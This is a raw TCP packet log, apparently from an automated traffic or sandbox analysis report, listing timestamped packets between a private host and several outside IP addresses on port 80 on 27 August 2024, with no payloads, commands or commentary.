                                                Aug 27, 2024 08:04:21.780783892 CEST4991480192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.780919075 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.781147957 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.781269073 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.781439066 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.881041050 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.881129980 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.881356001 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.881479979 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.881606102 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.881614923 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:22.023859978 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:22.023870945 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:22.023935080 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:24.108274937 CEST4991580192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:24.209012032 CEST8049915172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:24.209168911 CEST4991580192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:24.214206934 CEST4991580192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:24.314798117 CEST8049915172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:24.487061977 CEST8049915172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:24.487073898 CEST8049915172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:24.487122059 CEST8049915172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:24.487426043 CEST4991580192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:24.490741014 CEST4991580192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:24.591355085 CEST8049915172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:29.499682903 CEST4991680192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:29.663753986 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:29.664031029 CEST4991680192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:29.671473980 CEST4991680192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:29.835544109 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:29.841197014 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:29.841300964 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:29.841355085 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:29.841423035 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:29.841545105 CEST4991680192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:29.841547012 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:29.841572046 CEST4991680192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:29.841722965 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:29.841736078 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:29.841747046 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:29.841758966 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:29.841799974 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:29.841897011 CEST4991680192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:29.841974974 CEST4991680192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:30.006048918 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:30.006127119 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:30.006186008 CEST8049916203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:30.006347895 CEST4991680192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:31.182678938 CEST4991680192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:32.199990034 CEST4991780192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:32.365150928 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.365370989 CEST4991780192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:32.373034954 CEST4991780192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:32.538455009 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.544738054 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.544775009 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.544940948 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.544955015 CEST4991780192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:32.544996977 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.545026064 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.545136929 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.545147896 CEST4991780192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:32.545183897 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.545212984 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.545376062 CEST4991780192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:32.545454025 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.545488119 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.545659065 CEST4991780192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:32.710145950 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.710201025 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.710288048 CEST8049917203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:32.710422993 CEST4991780192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:32.710422993 CEST4991780192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:33.885272026 CEST4991780192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:34.902570009 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.067718029 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.067930937 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.077394009 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.077414036 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.077461004 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.244107962 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.244118929 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.244158030 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.244333982 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.244508028 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.244543076 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.244553089 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.244853973 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.245032072 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.410401106 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.410492897 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.410504103 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.410626888 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.410715103 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.410795927 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.410962105 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.411582947 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.411679983 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.411688089 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.411926985 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.575594902 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.575690985 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.575855970 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.576242924 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.576432943 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.576689005 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.594274044 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.594376087 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.594501972 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.594516993 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.594528913 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.594624043 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.594638109 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.594703913 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.594736099 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.594858885 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.594891071 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.595010042 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.595041990 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.595201969 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.759757996 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.759849072 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.759968042 CEST8049918203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:35.760044098 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:35.760247946 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:36.587763071 CEST4991880192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:37.607280016 CEST4991980192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:37.771485090 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:37.771660089 CEST4991980192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:37.776644945 CEST4991980192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:37.940485001 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:37.945152998 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:37.945256948 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:37.945271015 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:37.945394039 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:37.945421934 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:37.945492029 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:37.945569038 CEST4991980192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:37.945570946 CEST4991980192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:37.945604086 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:37.945635080 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:37.945651054 CEST4991980192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:37.945785046 CEST4991980192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:37.945831060 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:37.945844889 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:37.946048021 CEST4991980192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:38.109497070 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:38.109565020 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:38.109615088 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:38.109816074 CEST4991980192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:38.109911919 CEST4991980192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:38.113276958 CEST4991980192.168.11.20203.161.46.205
                                                Aug 27, 2024 08:04:38.277681112 CEST8049919203.161.46.205192.168.11.20
                                                Aug 27, 2024 08:04:43.119656086 CEST4992080192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:43.381724119 CEST804992018.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:43.382014036 CEST4992080192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:43.390801907 CEST4992080192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:43.652726889 CEST804992018.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:43.652978897 CEST804992018.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:43.653136969 CEST804992018.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:43.653151989 CEST804992018.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:43.653176069 CEST804992018.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:43.653287888 CEST4992080192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:43.653287888 CEST4992080192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:44.898439884 CEST4992080192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:45.915816069 CEST4992180192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:46.178663969 CEST804992118.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:46.178910971 CEST4992180192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:46.186429977 CEST4992180192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:46.449610949 CEST804992118.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:46.449707031 CEST804992118.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:46.449721098 CEST804992118.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:46.449842930 CEST804992118.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:46.449934959 CEST804992118.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:46.450056076 CEST4992180192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:46.450134993 CEST4992180192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:47.694695950 CEST4992180192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:48.712038994 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:48.978426933 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:48.978678942 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:48.987231970 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:48.987271070 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:48.987344980 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.253683090 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.253784895 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.253796101 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.253895998 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.253905058 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.254020929 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.254106998 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.254168034 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.254268885 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.254292011 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.254314899 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.254323959 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.254420042 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.254606962 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.254606962 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.294912100 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.295052052 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.295202971 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.520564079 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.520675898 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.520747900 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.520796061 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.520890951 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.520994902 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.521059036 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.521127939 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.521138906 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.521214008 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.521317959 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.521398067 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.521483898 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.521565914 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:49.521579981 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.521703959 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.521826982 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.522160053 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.561332941 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.787220001 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.787342072 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.787462950 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.787630081 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.787769079 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.787884951 CEST804992218.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:49.787981033 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:50.490967035 CEST4992280192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:51.508332014 CEST4992380192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:51.774938107 CEST804992318.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:51.775191069 CEST4992380192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:51.780174017 CEST4992380192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:52.048850060 CEST804992318.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:52.048980951 CEST804992318.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:52.049109936 CEST804992318.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:52.049124002 CEST804992318.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:52.049134970 CEST804992318.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:52.049443960 CEST4992380192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:52.052495956 CEST4992380192.168.11.2018.183.3.45
                                                Aug 27, 2024 08:04:52.319106102 CEST804992318.183.3.45192.168.11.20
                                                Aug 27, 2024 08:04:57.585161924 CEST4992480192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:04:57.908375025 CEST8049924154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:04:57.908551931 CEST4992480192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:04:57.916975021 CEST4992480192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:04:58.240060091 CEST8049924154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:04:58.240266085 CEST8049924154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:04:58.240453959 CEST4992480192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:04:59.426472902 CEST4992480192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:00.444164038 CEST4992580192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:00.745767117 CEST8049925154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:00.745981932 CEST4992580192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:00.754173040 CEST4992580192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:01.055835962 CEST8049925154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:01.056082964 CEST8049925154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:01.056268930 CEST4992580192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:02.269673109 CEST4992580192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:03.286968946 CEST4992680192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:03.595238924 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:03.595511913 CEST4992680192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:03.605206013 CEST4992680192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:03.605288982 CEST4992680192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:03.913836956 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:03.914062023 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:03.914192915 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:03.914344072 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:03.914611101 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:03.914655924 CEST4992680192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:03.914830923 CEST4992680192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:03.914994001 CEST4992680192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:03.915164948 CEST4992680192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:04.223212957 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.223320007 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.223386049 CEST4992680192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:04.223522902 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.223718882 CEST4992680192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:04.223886967 CEST4992680192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:04.224015951 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.224052906 CEST4992680192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:04.224070072 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.224873066 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.224982023 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.225255966 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.531897068 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.532437086 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.532598972 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.532835007 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.533047915 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.533267021 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.533427000 CEST8049926154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:04.533598900 CEST4992680192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:05.112823963 CEST4992680192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:06.130347967 CEST4992780192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:06.431813955 CEST8049927154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:06.431992054 CEST4992780192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:06.436834097 CEST4992780192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:06.738383055 CEST8049927154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:06.738729954 CEST8049927154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:06.739078999 CEST4992780192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:06.740842104 CEST4992780192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:05:07.042413950 CEST8049927154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:05:11.755808115 CEST4992880192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:11.995023966 CEST8049928185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:11.995176077 CEST4992880192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:12.002552986 CEST4992880192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:12.241764069 CEST8049928185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:12.296715021 CEST8049928185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:12.296803951 CEST8049928185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:12.296958923 CEST4992880192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:13.517251015 CEST4992880192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:14.534820080 CEST4992980192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:14.774040937 CEST8049929185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:14.774214029 CEST4992980192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:14.782661915 CEST4992980192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:15.021797895 CEST8049929185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:15.073818922 CEST8049929185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:15.073951960 CEST8049929185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:15.074084044 CEST4992980192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:16.297894001 CEST4992980192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.315150023 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.554526091 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.554692984 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.563122034 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.563139915 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.563190937 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.802536011 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802628040 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802639008 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802714109 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802722931 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802731037 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802771091 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802781105 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802840948 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.802959919 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802968979 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.803014040 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.803179026 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.803349972 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:18.042181015 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042288065 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042299032 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042315960 CEST4993080192.168.11.20185.230.15.3
